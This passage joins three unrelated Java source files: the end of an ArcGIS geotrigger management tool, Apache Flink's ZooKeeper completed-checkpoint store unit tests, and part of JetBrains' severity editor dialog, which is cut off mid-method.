                    trackingProfile, times, rateLimit, boundingBoxReturnFormat, geoReturnFormat, fromTimestamp,
                    toTimestamp);
        } else if (geoJson != null) {
            handler.createTrigger(triggerId, tags, direction, geoJson, notificationText, notificationUrl,
                    notificationIcon, notificationSound, notificationData, callBackUrl, properties, trackingProfile,
                    times, rateLimit, boundingBoxReturnFormat, geoReturnFormat, fromTimestamp, toTimestamp);
        }
    }

    /**
     * Create geotriggers from a feature service, as described by an XML
     * configuration file: existing triggers for the configured tags are deleted,
     * then new triggers are generated from the service features.
     * @param params The parameters for the trigger.
     */
    private static void createTriggerFromService(Map<String, String> params) {
        log.info("Creating triggers from service...");
        String configXml = params.get(CONFIGFILE);
        log.debug("Config file: " + configXml);
        if (Util.isEmpty(configXml)) {
            return;
        }
        File configFile = new File(configXml);
        if (!configFile.exists()) {
            log.error("The configuration file does not exist.");
            return;
        }
        ConfigurationReader reader = new ConfigurationReader(configFile);
        try {
            Configuration configuration = reader.read();
            // delete the old triggers
            deleteTriggers(configuration);
            // create new triggers
            generateTriggers(configuration);
        } catch (ReaderException e) {
            log.error("Error parsing configuration file: " + e.getMessage());
        }
    }

    /**
     * Delete old triggers by the tags specified in each configured query.
     */
    private static void deleteTriggers(Configuration configuration) {
        List<Query> queries = configuration.getQuery();
        for (Query query : queries) {
            Arcgis arcgis = query.getArcgis();
            String clientId = arcgis.getApp().getClientId();
            String clientSecret = arcgis.getApp().getClientSecret();
            setAppId(clientId, clientSecret);
            Trigger trigger = query.getTrigger();
            String[] tags = splitList(trigger.getTags());
            TriggerHandler triggerHandler = new TriggerHandler();
            triggerHandler.deleteTriggersByTags(tags);
        }
    }

    /**
     * Generate triggers for the features in the services as defined in the configuration.
     */
    public static void generateTriggers(Configuration configuration) {
        List<Query> queries = configuration.getQuery();
        for (Query query : queries) {
            Arcgis arcgis = query.getArcgis();
            String featureServiceUrl = arcgis.getFeatureClass();
            String user = arcgis.getLogin().getUser();
            String password = arcgis.getLogin().getPassword();
            String clientId = arcgis.getApp().getClientId();
            String clientSecret = arcgis.getApp().getClientSecret();
            setAppId(clientId, clientSecret);
            Trigger trigger = query.getTrigger();
            String triggerId = trigger.getTriggerID();
            String[] tags = splitList(trigger.getTags());
            String direction = trigger.getDirection();
            float radius = trigger.getRadius();
            Notification notification = trigger.getNotification();
            String notificationText = notification.getText();
            String notificationUrl = notification.getUrl();
            String notificationData = notification.getData();
            String where = trigger.getWhere();
            TriggerHandler triggerHandler = new TriggerHandler();
            triggerHandler.createTriggersFromService(featureServiceUrl, user, password, triggerId, tags, direction,
                    radius, notificationText, notificationUrl, notificationData, where);
        }
    }

    /**
     * Delete triggers by tags.
     * @param params The parameters for the triggers.
     */
    private static void deleteTriggers(Map<String, String> params) {
        log.info("Deleting trigger..."); // BUGFIX: typo "Deleating"
        String[] tags = splitList(params.get(TAGS));
        String clientId = params.get(CLIENTID);
        String clientSecret = params.get(CLIENTSECRET);
        if (checkCredentials(clientId, clientSecret)) {
            setAppId(clientId, clientSecret);
            TriggerHandler handler = new TriggerHandler();
            handler.deleteTriggersByTags(tags);
        }
    }

    /**
     * Run a trigger.
     * @param params The parameters for the trigger.
     */
    private static void runTrigger(Map<String, String> params) {
        log.info("Run trigger...");
        String[] triggerIds = splitList(params.get(TRIGGER_IDS));
        String[] deviceIds = splitList(params.get(DEVICE_IDS));
        String clientId = params.get(CLIENTID);
        String clientSecret = params.get(CLIENTSECRET);
        if (checkCredentials(clientId, clientSecret)) {
            setAppId(clientId, clientSecret);
            TriggerHandler handler = new TriggerHandler();
            handler.runTrigger(triggerIds, deviceIds);
        }
    }

    /**
     * Delete tags.
     * @param params The parameters for the trigger.
     */
    private static void deleteTags(Map<String, String> params) {
        log.info("Deleting tags..."); // BUGFIX: typo "Deleating"
        String[] tags = splitList(params.get(TAGS));
        String clientId = params.get(CLIENTID);
        String clientSecret = params.get(CLIENTSECRET);
        if (checkCredentials(clientId, clientSecret)) {
            setAppId(clientId, clientSecret);
            TriggerHandler handler = new TriggerHandler();
            handler.deleteTags(tags);
        }
    }

    /** Stores the app credentials in the shared {@link Params} singleton. */
    private static void setAppId(String clientId, String clientSecret) {
        Params.get().setClientId(clientId);
        Params.get().setClientSecret(clientSecret);
    }
}
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.apache.flink.runtime.checkpoint;

import org.apache.flink.api.common.JobID;
import org.apache.flink.api.common.JobStatus;
import org.apache.flink.api.java.tuple.Tuple2;
import org.apache.flink.configuration.Configuration;
import org.apache.flink.configuration.HighAvailabilityOptions;
import org.apache.flink.runtime.operators.testutils.ExpectedTestException;
import org.apache.flink.runtime.state.RetrievableStateHandle;
import org.apache.flink.runtime.state.SharedStateRegistry;
import org.apache.flink.runtime.state.testutils.TestCompletedCheckpointStorageLocation;
import org.apache.flink.runtime.util.ZooKeeperUtils;
import org.apache.flink.runtime.zookeeper.ZooKeeperResource;
import org.apache.flink.runtime.zookeeper.ZooKeeperStateHandleStore;
import org.apache.flink.util.ExceptionUtils;
import org.apache.flink.util.TestLogger;
import org.apache.flink.util.concurrent.Executors;
import org.apache.flink.util.function.TriConsumer;

import org.apache.flink.shaded.curator4.org.apache.curator.framework.CuratorFramework;

import org.hamcrest.Matchers;
import org.junit.ClassRule;
import org.junit.Test;

import javax.annotation.Nonnull;

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.concurrent.CountDownLatch;
import java.util.function.Function;
import java.util.stream.IntStream;

import static org.apache.flink.runtime.checkpoint.CheckpointRetentionPolicy.NEVER_RETAIN_AFTER_TERMINATION;
import static org.apache.flink.runtime.checkpoint.CompletedCheckpointStoreTest.createCheckpoint;
import static org.apache.flink.util.ExceptionUtils.findThrowable;
import static org.apache.flink.util.ExceptionUtils.rethrow;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertThat;

/** Tests for {@link DefaultCompletedCheckpointStore} with {@link ZooKeeperStateHandleStore}. */
public class ZooKeeperCompletedCheckpointStoreTest extends TestLogger {

    // Shared embedded ZooKeeper instance for all tests in this class.
    @ClassRule public static ZooKeeperResource zooKeeperResource = new ZooKeeperResource();

    private static final ZooKeeperCheckpointStoreUtil zooKeeperCheckpointStoreUtil =
            ZooKeeperCheckpointStoreUtil.INSTANCE;

    /** Checkpoint id -> ZNode name -> checkpoint id must round-trip. */
    @Test
    public void testPathConversion() {
        final long checkpointId = 42L;

        final String path = zooKeeperCheckpointStoreUtil.checkpointIDToName(checkpointId);

        assertEquals(checkpointId, zooKeeperCheckpointStoreUtil.nameToCheckpointID(path));
    }

    /** recover() must surface the exception thrown while downloading a checkpoint handle. */
    @Test(expected = ExpectedTestException.class)
    public void testRecoverFailsIfDownloadFails() throws Exception {
        testDownloadInternal(
                (store, checkpointsInZk, sharedStateRegistry) -> {
                    try {
                        checkpointsInZk.add(
                                createHandle(
                                        1,
                                        id -> {
                                            throw new ExpectedTestException();
                                        }));
                        store.recover();
                    } catch (Exception exception) {
                        // unwrap to the ExpectedTestException the @Test annotation expects
                        findThrowable(exception, ExpectedTestException.class)
                                .ifPresent(ExceptionUtils::rethrow);
                        rethrow(exception);
                    }
                });
    }

    /** When the store already holds the checkpoint, recover() must not re-download it. */
    @Test
    public void testNoDownloadIfCheckpointsNotChanged() throws Exception {
        testDownloadInternal(
                (store, checkpointsInZk, sharedStateRegistry) -> {
                    try {
                        checkpointsInZk.add(
                                createHandle(
                                        1,
                                        id -> {
                                            // any retrieval attempt fails the test
                                            throw new AssertionError(
                                                    "retrieveState was attempted for checkpoint "
                                                            + id);
                                        }));
                        store.addCheckpoint(
                                createCheckpoint(1, sharedStateRegistry),
                                new CheckpointsCleaner(),
                                () -> {
                                    /*no op*/
                                });
                        store.recover(); // will fail in case of attempt to retrieve state
                    } catch (Exception exception) {
                        throw new RuntimeException(exception);
                    }
                });
    }

    /** When ZooKeeper has newer checkpoints than the store, recover() must download them. */
    @Test
    public void testDownloadIfCheckpointsChanged() throws Exception {
        testDownloadInternal(
                (store, checkpointsInZk, sharedStateRegistry) -> {
                    try {
                        int lastInZk = 10;
                        IntStream.range(0, lastInZk + 1)
                                .forEach(
                                        i ->
                                                checkpointsInZk.add(
                                                        createHandle(
                                                                i,
                                                                id ->
                                                                        createCheckpoint(
                                                                                id,
                                                                                sharedStateRegistry))));
                        store.addCheckpoint(
                                createCheckpoint(1, sharedStateRegistry),
                                new CheckpointsCleaner(),
                                () -> {
                                    /*no op*/
                                });
                        store.addCheckpoint(
                                createCheckpoint(5, sharedStateRegistry),
                                new CheckpointsCleaner(),
                                () -> {
                                    /*no op*/
                                });
                        store.recover();
                        assertEquals(lastInZk, store.getLatestCheckpoint(false).getCheckpointID());
                    } catch (Exception exception) {
                        throw new RuntimeException(exception);
                    }
                });
    }

    /**
     * Shared harness for the download tests: builds a store over a handle-store stub whose
     * getAllAndLock() serves the mutable checkpointsInZk list, runs the given test body, then
     * shuts the store down and closes the registry.
     */
    private void testDownloadInternal(
            TriConsumer<
                            CompletedCheckpointStore,
                            List<Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String>>,
                            SharedStateRegistry>
                    test)
            throws Exception {
        SharedStateRegistry sharedStateRegistry = new SharedStateRegistry();
        Configuration configuration = new Configuration();
        configuration.setString(
                HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString());

        List<Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String>> checkpointsInZk =
                new ArrayList<>();
        ZooKeeperStateHandleStore<CompletedCheckpoint> checkpointsInZooKeeper =
                new ZooKeeperStateHandleStore<CompletedCheckpoint>(
                        ZooKeeperUtils.startCuratorFramework(configuration),
                        new TestingRetrievableStateStorageHelper<>()) {
                    @Override
                    public List<Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String>>
                            getAllAndLock() {
                        return checkpointsInZk;
                    }
                };

        CompletedCheckpointStore store =
                new DefaultCompletedCheckpointStore<>(
                        10,
                        checkpointsInZooKeeper,
                        zooKeeperCheckpointStoreUtil,
                        Executors.directExecutor());
        try {
            test.accept(store, checkpointsInZk, sharedStateRegistry);
        } finally {
            store.shutdown(JobStatus.FINISHED, new CheckpointsCleaner());
            sharedStateRegistry.close();
        }
    }

    /** Wraps a checkpoint supplier as a (handle, znode-name) pair for the given id. */
    private Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String> createHandle(
            long id, Function<Long, CompletedCheckpoint> checkpointSupplier) {
        return Tuple2.of(
                new CheckpointStateHandle(checkpointSupplier, id),
                zooKeeperCheckpointStoreUtil.checkpointIDToName(id));
    }

    /** Tests that subsumed checkpoints are discarded. */
    @Test
    public void testDiscardingSubsumedCheckpoints() throws Exception {
        final SharedStateRegistry sharedStateRegistry = new SharedStateRegistry();
        final Configuration configuration = new Configuration();
        configuration.setString(
                HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString());

        final CuratorFramework client = ZooKeeperUtils.startCuratorFramework(configuration);
        final CompletedCheckpointStore checkpointStore = createZooKeeperCheckpointStore(client);

        try {
            final CompletedCheckpointStoreTest.TestCompletedCheckpoint checkpoint1 =
                    CompletedCheckpointStoreTest.createCheckpoint(0, sharedStateRegistry);

            checkpointStore.addCheckpoint(checkpoint1, new CheckpointsCleaner(), () -> {});
            assertThat(checkpointStore.getAllCheckpoints(), Matchers.contains(checkpoint1));

            final CompletedCheckpointStoreTest.TestCompletedCheckpoint checkpoint2 =
                    CompletedCheckpointStoreTest.createCheckpoint(1, sharedStateRegistry);
            checkpointStore.addCheckpoint(checkpoint2, new CheckpointsCleaner(), () -> {});
            final List<CompletedCheckpoint> allCheckpoints = checkpointStore.getAllCheckpoints();
            // the store retains one checkpoint, so checkpoint1 must be subsumed by checkpoint2
            assertThat(allCheckpoints, Matchers.contains(checkpoint2));
            assertThat(allCheckpoints, Matchers.not(Matchers.contains(checkpoint1)));

            // verify that the subsumed checkpoint is discarded
            CompletedCheckpointStoreTest.verifyCheckpointDiscarded(checkpoint1);
        } finally {
            client.close();
        }
    }

    /**
     * Tests that checkpoints are discarded when the completed checkpoint store is shut down with a
     * globally terminal state.
     */
    @Test
    public void testDiscardingCheckpointsAtShutDown() throws Exception {
        final SharedStateRegistry sharedStateRegistry = new SharedStateRegistry();
        final Configuration configuration = new Configuration();
        configuration.setString(
                HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString());

        final CuratorFramework client = ZooKeeperUtils.startCuratorFramework(configuration);
        final CompletedCheckpointStore checkpointStore = createZooKeeperCheckpointStore(client);

        try {
            final CompletedCheckpointStoreTest.TestCompletedCheckpoint checkpoint1 =
                    CompletedCheckpointStoreTest.createCheckpoint(0, sharedStateRegistry);

            checkpointStore.addCheckpoint(checkpoint1, new CheckpointsCleaner(), () -> {});
            assertThat(checkpointStore.getAllCheckpoints(), Matchers.contains(checkpoint1));

            // FINISHED is globally terminal, so shutdown must discard retained checkpoints
            checkpointStore.shutdown(JobStatus.FINISHED, new CheckpointsCleaner());

            // verify that the checkpoint is discarded
            CompletedCheckpointStoreTest.verifyCheckpointDiscarded(checkpoint1);
        } finally {
            client.close();
        }
    }

    /** Creates a store over a real ZooKeeper handle store that retains a single checkpoint. */
    @Nonnull
    private CompletedCheckpointStore createZooKeeperCheckpointStore(CuratorFramework client)
            throws Exception {
        final ZooKeeperStateHandleStore<CompletedCheckpoint> checkpointsInZooKeeper =
                ZooKeeperUtils.createZooKeeperStateHandleStore(
                        client, "/checkpoints", new TestingRetrievableStateStorageHelper<>());
        return new DefaultCompletedCheckpointStore<>(
                1,
                checkpointsInZooKeeper,
                zooKeeperCheckpointStoreUtil,
                Executors.directExecutor());
    }

    /** Test handle that defers checkpoint creation to the supplied function on retrieval. */
    private static class CheckpointStateHandle
            implements RetrievableStateHandle<CompletedCheckpoint> {
        private static final long serialVersionUID = 1L;
        private final Function<Long, CompletedCheckpoint> checkpointSupplier;
        private final long id;

        CheckpointStateHandle(Function<Long, CompletedCheckpoint> checkpointSupplier, long id) {
            this.checkpointSupplier = checkpointSupplier;
            this.id = id;
        }

        @Override
        public CompletedCheckpoint retrieveState() {
            return checkpointSupplier.apply(id);
        }

        @Override
        public void discardState() {}

        @Override
        public long getStateSize() {
            return 0;
        }
    }

    /**
     * Tests that the checkpoint does not exist in the store when we fail to add it into the store
     * (i.e., there exists an exception thrown by the method).
     */
    @Test
    public void testAddCheckpointWithFailedRemove() throws Exception {
        final int numCheckpointsToRetain = 1;
        final Configuration configuration = new Configuration();
        configuration.setString(
                HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString());

        final CuratorFramework client = ZooKeeperUtils.startCuratorFramework(configuration);
        final CompletedCheckpointStore store = createZooKeeperCheckpointStore(client);

        CountDownLatch discardAttempted = new CountDownLatch(1);
        for (long i = 0; i < numCheckpointsToRetain + 1; ++i) {
            CompletedCheckpoint checkpointToAdd =
                    new CompletedCheckpoint(
                            new JobID(),
                            i,
                            i,
                            i,
                            Collections.emptyMap(),
                            Collections.emptyList(),
                            CheckpointProperties.forCheckpoint(NEVER_RETAIN_AFTER_TERMINATION),
                            new TestCompletedCheckpointStorageLocation());
            // shouldn't fail despite the exception thrown by the cleanup callback below
            store.addCheckpoint(
                    checkpointToAdd,
                    new CheckpointsCleaner(),
                    () -> {
                        discardAttempted.countDown();
                        throw new RuntimeException();
                    });
        }
        discardAttempted.await();
    }
}
// Copyright 2000-2018 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.codeInspection.ex;

import com.intellij.application.options.colors.ColorAndFontDescriptionPanel;
import com.intellij.application.options.colors.InspectionColorSettingsPage;
import com.intellij.application.options.colors.TextAttributesDescription;
import com.intellij.codeInsight.daemon.impl.HighlightInfoType;
import com.intellij.codeInsight.daemon.impl.SeverityRegistrar;
import com.intellij.codeInsight.daemon.impl.SeverityUtil;
import com.intellij.codeInspection.InspectionsBundle;
import com.intellij.ide.DataManager;
import com.intellij.lang.annotation.HighlightSeverity;
import com.intellij.openapi.actionSystem.AnActionEvent;
import com.intellij.openapi.actionSystem.DataContext;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.editor.colors.CodeInsightColors;
import com.intellij.openapi.editor.colors.TextAttributesKey;
import com.intellij.openapi.editor.markup.TextAttributes;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.ui.DialogWrapper;
import com.intellij.openapi.ui.InputValidator;
import com.intellij.openapi.ui.Messages;
import com.intellij.openapi.util.Comparing;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.profile.codeInspection.ui.SingleInspectionProfilePanel;
import com.intellij.ui.*;
import com.intellij.ui.components.JBList;
import com.intellij.util.Consumer;
import com.intellij.util.ui.JBUI;
import org.jdom.Element;
import org.jetbrains.annotations.NonNls;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;

import javax.swing.*;
import javax.swing.event.ListSelectionEvent;
import javax.swing.event.ListSelectionListener;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.util.*;
import java.util.List;

import static com.intellij.application.options.colors.ColorAndFontOptions.selectOrEditColor;
import static com.intellij.codeInsight.daemon.impl.SeverityRegistrar.SeverityBasedTextAttributes;

/**
 * Modal dialog for managing custom highlighting severities: a list of all registered severities on
 * the left and, on the right, either a text-attributes editor (for custom severities) or a button
 * linking to the Colors &amp; Fonts settings (for built-in ones). Changes are committed to the
 * {@link SeverityRegistrar} in {@link #doOKAction()}.
 */
public class SeverityEditorDialog extends DialogWrapper {
  private static final Logger LOG = Logger.getInstance(SeverityEditorDialog.class);

  private final JPanel myPanel;

  private final JList<SeverityBasedTextAttributes> myOptionsList = new JBList<>();
  private final ColorAndFontDescriptionPanel myOptionsPanel = new ColorAndFontDescriptionPanel();

  // last selection whose edits must be flushed (via apply) before switching to a new one
  private SeverityBasedTextAttributes myCurrentSelection;
  private final SeverityRegistrar mySeverityRegistrar;
  private final boolean myCloseDialogWhenSettingsShown;
  // card layout toggling between the DEFAULT (read-only) and EDITABLE right-hand panels
  private final CardLayout myCard;
  private final JPanel myRightPanel;
  @NonNls private static final String DEFAULT = "DEFAULT";
  @NonNls private static final String EDITABLE = "EDITABLE";

  /**
   * Shows the dialog and, if the user accepts, reports the severity selected at close time to
   * {@code chosenSeverityCallback} (when non-null).
   */
  public static void show(@NotNull Project project,
                          @Nullable HighlightSeverity selectedSeverity,
                          @NotNull SeverityRegistrar severityRegistrar,
                          boolean closeDialogWhenSettingsShown,
                          @Nullable Consumer<HighlightSeverity> chosenSeverityCallback) {
    final SeverityEditorDialog dialog =
      new SeverityEditorDialog(project, selectedSeverity, severityRegistrar, closeDialogWhenSettingsShown);
    if (dialog.showAndGet()) {
      final HighlightInfoType type = dialog.getSelectedType();
      if (type != null) {
        final HighlightSeverity severity = type.getSeverity(null);
        if (chosenSeverityCallback != null) {
          chosenSeverityCallback.consume(severity);
        }
      }
    }
  }

  private SeverityEditorDialog(@NotNull Project project,
                               @Nullable HighlightSeverity selectedSeverity,
                               @NotNull SeverityRegistrar severityRegistrar,
                               boolean closeDialogWhenSettingsShown) {
    super(project, true);
    mySeverityRegistrar = severityRegistrar;
    myCloseDialogWhenSettingsShown = closeDialogWhenSettingsShown;
    myOptionsList.setCellRenderer(new DefaultListCellRenderer() {
      @Override
      public Component getListCellRendererComponent(JList list, Object value, int index, boolean isSelected, boolean cellHasFocus) {
        final Component rendererComponent = super.getListCellRendererComponent(list, value, index, isSelected, cellHasFocus);
        setText(SingleInspectionProfilePanel.renderSeverity(((SeverityBasedTextAttributes)value).getSeverity()));
        return rendererComponent;
      }
    });
    myOptionsList.addListSelectionListener(new ListSelectionListener() {
      @Override
      public void valueChanged(ListSelectionEvent e) {
        // flush pending edits of the previous selection before switching
        if (myCurrentSelection != null) {
          apply(myCurrentSelection);
        }
        myCurrentSelection = myOptionsList.getSelectedValue();
        if (myCurrentSelection != null) {
          reset(myCurrentSelection);
          // built-in severities are not editable here; show the settings link instead
          myCard.show(myRightPanel, SeverityRegistrar.isDefaultSeverity(myCurrentSelection.getSeverity()) ? DEFAULT : EDITABLE);
        }
      }
    });
    TreeUIHelper.getInstance().installListSpeedSearch(myOptionsList, attrs -> attrs.getSeverity().getName());
    myOptionsList.setSelectionMode(ListSelectionModel.SINGLE_SELECTION);
    JPanel leftPanel = ToolbarDecorator.createDecorator(myOptionsList)
      .setAddAction(new AnActionButtonRunnable() {
        @Override
        public void run(AnActionButton button) {
          final String name = Messages.showInputDialog(myPanel,
                                                       InspectionsBundle.message("highlight.severity.create.dialog.name.label"),
                                                       InspectionsBundle.message("highlight.severity.create.dialog.title"),
                                                       Messages.getQuestionIcon(), "", new InputValidator() {
              @Override
              public boolean checkInput(final String inputString) {
                return checkNameExist(inputString);
              }

              @Override
              public boolean canClose(final String inputString) {
                return checkInput(inputString);
              }
            });
          if (name == null) return;
          // new severities start from the default "warning" text attributes
          SeverityBasedTextAttributes newSeverityBasedTextAttributes =
            createSeverity(name, CodeInsightColors.WARNINGS_ATTRIBUTES.getDefaultAttributes());
          ((DefaultListModel<SeverityBasedTextAttributes>)myOptionsList.getModel()).addElement(newSeverityBasedTextAttributes);
          select(newSeverityBasedTextAttributes);
        }
      }).setMoveUpAction(new AnActionButtonRunnable() {
        @Override
        public void run(AnActionButton button) {
          apply(myCurrentSelection);
          ListUtil.moveSelectedItemsUp(myOptionsList);
        }
      }).setMoveDownAction(new AnActionButtonRunnable() {
        @Override
        public void run(AnActionButton button) {
          apply(myCurrentSelection);
          ListUtil.moveSelectedItemsDown(myOptionsList);
        }
      }).setEditAction(new AnActionButtonRunnable() {
        @Override
        public void run(AnActionButton button) {
          // "rename" is implemented by replacing the entry with a fresh severity of the new name
          String oldName = myCurrentSelection.getSeverity().getName();
          String newName = Messages.showInputDialog(myPanel,
                                                    InspectionsBundle.message("highlight.severity.create.dialog.name.label"),
                                                    "Edit Severity Name",
                                                    null, oldName, new InputValidator() {
              @Override
              public boolean checkInput(String inputString) {
                return checkNameExist(inputString);
              }

              @Override
              public boolean canClose(String inputString) {
                return checkInput(inputString);
              }
            });
          if (newName != null && !oldName.equals(newName)) {
            SeverityBasedTextAttributes newSeverityBasedTextAttributes =
              createSeverity(newName, myCurrentSelection.getAttributes());
            int index = myOptionsList.getSelectedIndex();
            ((DefaultListModel<SeverityBasedTextAttributes>)myOptionsList.getModel()).set(index, newSeverityBasedTextAttributes);
            select(newSeverityBasedTextAttributes);
          }
        }
      }).setEditActionUpdater(new AnActionButtonUpdater() {
        @Override
        public boolean isEnabled(AnActionEvent e) {
          // built-in severities cannot be renamed
          return myCurrentSelection != null && !SeverityRegistrar.isDefaultSeverity(myCurrentSelection.getSeverity());
        }
      }).setEditActionName("Rename").createPanel();
    ToolbarDecorator.findRemoveButton(leftPanel).addCustomUpdater(new AnActionButtonUpdater() {
      @Override
      public boolean isEnabled(AnActionEvent e) {
        // built-in severities cannot be removed
        return !SeverityRegistrar.isDefaultSeverity(myOptionsList.getSelectedValue().getSeverity());
      }
    });
    ToolbarDecorator.findUpButton(leftPanel).addCustomUpdater(new AnActionButtonUpdater() {
      @Override
      public boolean isEnabled(AnActionEvent e) {
        boolean canMove = ListUtil.canMoveSelectedItemsUp(myOptionsList);
        // don't allow a default severity to trade places with another default one
        if (canMove) {
          SeverityBasedTextAttributes pair = myOptionsList.getSelectedValue();
          if (pair != null && SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) {
            final int newPosition = myOptionsList.getSelectedIndex() - 1;
            pair = myOptionsList.getModel().getElementAt(newPosition);
            if (SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) {
              canMove = false;
            }
          }
        }
        return canMove;
      }
    });
    ToolbarDecorator.findDownButton(leftPanel).addCustomUpdater(new AnActionButtonUpdater() {
      @Override
      public boolean isEnabled(AnActionEvent e) {
        boolean canMove = ListUtil.canMoveSelectedItemsDown(myOptionsList);
        // mirror of the up-button rule, in the other direction
        if (canMove) {
          SeverityBasedTextAttributes pair = myOptionsList.getSelectedValue();
          if (pair != null && SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) {
            final int newPosition = myOptionsList.getSelectedIndex() + 1;
            pair = myOptionsList.getModel().getElementAt(newPosition);
            if (SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) {
              canMove = false;
            }
          }
        }
        return canMove;
      }
    });

    myPanel = new JPanel(new BorderLayout());
    myPanel.add(leftPanel, BorderLayout.CENTER);
    myCard = new CardLayout();
    myRightPanel = new JPanel(myCard);
    final JPanel disabled = new JPanel(new GridBagLayout());
    final JButton button = new JButton(InspectionsBundle.message("severities.default.settings.message"));
    button.addActionListener(new ActionListener() {
      @Override
      public void actionPerformed(final ActionEvent e) {
        editColorsAndFonts();
      }
    });
    disabled.add(button,
                 new GridBagConstraints(0, 0, 1, 1, 0, 0, GridBagConstraints.CENTER, GridBagConstraints.NONE, JBUI.emptyInsets(), 0, 0));
    myRightPanel.add(DEFAULT, disabled);
    myRightPanel.add(EDITABLE, myOptionsPanel);
    myCard.show(myRightPanel, EDITABLE);
    myPanel.add(myRightPanel, BorderLayout.EAST);
    fillList(selectedSeverity);
    init();
    setTitle(InspectionsBundle.message("severities.editor.dialog.title"));
    reset(myOptionsList.getSelectedValue());
  }

  /**
   * Creates a new severity named {@code name} (fixed priority value 50) whose text attributes are
   * a clone of {@code parent}.
   */
  @NotNull
  public SeverityBasedTextAttributes createSeverity(@NotNull String name, @NotNull TextAttributes parent) {
    HighlightInfoType.HighlightInfoTypeImpl info =
      new HighlightInfoType.HighlightInfoTypeImpl(new HighlightSeverity(name, 50), TextAttributesKey.createTextAttributesKey(name));
    return new SeverityBasedTextAttributes(parent.clone(), info);
  }

  /** Selects the given entry in the list, scrolling it into view. */
  public void select(SeverityBasedTextAttributes newSeverityBasedTextAttributes) {
    myOptionsList.clearSelection();
    ScrollingUtil.selectItem(myOptionsList, newSeverityBasedTextAttributes);
  }

  /**
   * Returns {@code true} when {@code newName} is non-empty and not already used by any severity in
   * the list (case-insensitive). Despite the name, this validates that the name does NOT exist.
   */
  private boolean checkNameExist(@NotNull String newName) {
    if (StringUtil.isEmpty(newName)) return false;
    final ListModel listModel = myOptionsList.getModel();
    for (int i = 0; i < listModel.getSize(); i++) {
      final String severityName = ((SeverityBasedTextAttributes)listModel.getElementAt(i)).getSeverity().myName;
      if (Comparing.strEqual(severityName, newName, false)) return false;
    }
    return true;
  }

  /** Jumps to the Colors &amp; Fonts settings page for the currently selected severity. */
  private void editColorsAndFonts() {
    final String toConfigure = Objects.requireNonNull(getSelectedType()).getSeverity(null).myName;
    if (myCloseDialogWhenSettingsShown) {
      doOKAction();
    }
    myOptionsList.clearSelection();
    final DataContext dataContext = DataManager.getInstance().getDataContext(myPanel);
    selectOrEditColor(dataContext, toConfigure, InspectionColorSettingsPage.class);
  }

  /** Populates the list from the registrar, preselecting {@code severity} (or the first entry). */
  private void fillList(final @Nullable HighlightSeverity severity) {
    DefaultListModel<SeverityBasedTextAttributes> model = new DefaultListModel<>();
    final List<SeverityBasedTextAttributes> infoTypes =
      new ArrayList<>(SeverityUtil.getRegisteredHighlightingInfoTypes(mySeverityRegistrar));
    SeverityBasedTextAttributes preselection = null;
    for (SeverityBasedTextAttributes type : infoTypes) {
      model.addElement(type);
      if (type.getSeverity().equals(severity)) {
        preselection = type;
      }
    }
    if (preselection == null && !infoTypes.isEmpty()) {
      preselection = infoTypes.get(0);
    }
    myOptionsList.setModel(model);
    myOptionsList.setSelectedValue(preselection, true);
  }

  /**
   * Copies the attributes currently shown in the editor panel into {@code info}, round-tripping
   * through a temporary JDOM element because the two objects do not share a direct setter API.
   */
  private void apply(SeverityBasedTextAttributes info) {
    if (info == null) {
      return;
    }
    MyTextAttributesDescription description =
      new MyTextAttributesDescription(info.getType().toString(), null, new TextAttributes(), info.getType().getAttributesKey());
    myOptionsPanel.apply(description, null);
    Element textAttributes = new Element("temp");
    try {
      description.getTextAttributes().writeExternal(textAttributes);
      info.getAttributes().readExternal(textAttributes);
    }
    catch (Exception e) {
      LOG.error(e);
    }
  }

  /** Inverse of {@link #apply}: loads {@code info}'s attributes into the editor panel. */
  private void reset(SeverityBasedTextAttributes info) {
    if (info == null) {
      return;
    }
    final MyTextAttributesDescription description =
      new MyTextAttributesDescription(info.getType().toString(), null, info.getAttributes(), info.getType().getAttributesKey());
    @NonNls Element textAttributes = new Element("temp");
    try {
      info.getAttributes().writeExternal(textAttributes);
      description.getTextAttributes().readExternal(textAttributes);
    }
    catch (Exception e) {
      LOG.error(e);
    }
    myOptionsPanel.reset(description);
  }

  @Override
  protected void doOKAction() {
    apply(myOptionsList.getSelectedValue());
    final Collection<SeverityBasedTextAttributes> infoTypes =
      new HashSet<>(SeverityUtil.getRegisteredHighlightingInfoTypes(mySeverityRegistrar));
    final ListModel listModel = myOptionsList.getModel();
    final List<HighlightSeverity> order = new ArrayList<>();
    // walk bottom-up so that `order` ends up lowest-severity-first
    for (int i = listModel.getSize() - 1; i >= 0; i--) {
      SeverityBasedTextAttributes info = (SeverityBasedTextAttributes)listModel.getElementAt(i);
      order.add(info.getSeverity());
